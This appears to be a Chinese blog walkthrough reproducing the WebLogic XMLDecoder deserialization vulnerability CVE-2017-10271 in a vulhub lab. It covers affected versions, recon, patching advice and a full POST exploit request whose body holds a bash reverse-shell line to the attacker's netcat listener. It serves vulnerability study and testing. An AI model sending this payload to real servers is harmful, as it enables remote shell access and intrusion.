Weblogic XML Decoder反序列化漏洞(CVE-2017-10271)

文章目录

    • 一、漏洞介绍
      • 1.1 漏洞详情
      • 1.2 影响版本
      • 1.3 漏洞指纹
    • 二、环境搭建
    • 三、攻击过程
      • 3.1 信息收集
      • 3.2 攻击操作
    • 四、防御措施

一、漏洞介绍

1.1 漏洞详情

  Weblogic的WLS Security组件组件对外提供webservice服务,其中使用XMLDecoder解析用户传入的XML数据,在解析过程中存在反序列化漏洞。

1.2 影响版本

受影响的Weblogic版本如下:

  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.1.0
  • 12.2.1.2.0

1.3 漏洞指纹

/wls-wsat/CoordinatorPortType11

二、环境搭建

  • 受害者:192.168.159.129(vulhub)
  • 攻击者:192.168.123.192

》》进入到如下目录执行
Weblogic XML Decoder反序列化漏洞(CVE-2017-10271)_第1张图片
》》访问管理控制台
Weblogic XML Decoder反序列化漏洞(CVE-2017-10271)_第2张图片

三、攻击过程

3.1 信息收集

》》nmap探测对方使用Weblogic
Weblogic XML Decoder反序列化漏洞(CVE-2017-10271)_第3张图片
》》访问如下web页面,如果存在说明可能存在漏洞

http://192.168.159.129:7001/wls-wsat/CoordinatorPortType11

Weblogic XML Decoder反序列化漏洞(CVE-2017-10271)_第4张图片

3.2 攻击操作

》》攻击者nc监听19111端口
在这里插入图片描述
》》向受害者地址POST以下payload

POST http://192.168.159.129:7001/wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.159.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

 





/bin/bash


-c


bash -i >& /dev/tcp/192.168.123.192/19111 0>&1








string中是反弹shell的IP地址,需要对特殊字符进行HTML编码,否则解析XML时候会出现格式错误

》》nc成功收到shell
Weblogic XML Decoder反序列化漏洞(CVE-2017-10271)_第5张图片

四、防御措施

  • Oracle官网下载最新提供的安全补丁
  • 根据业务需求,考虑是否删除WLS-WebServices组件(临时解决)

你可能感兴趣的:(漏洞复现)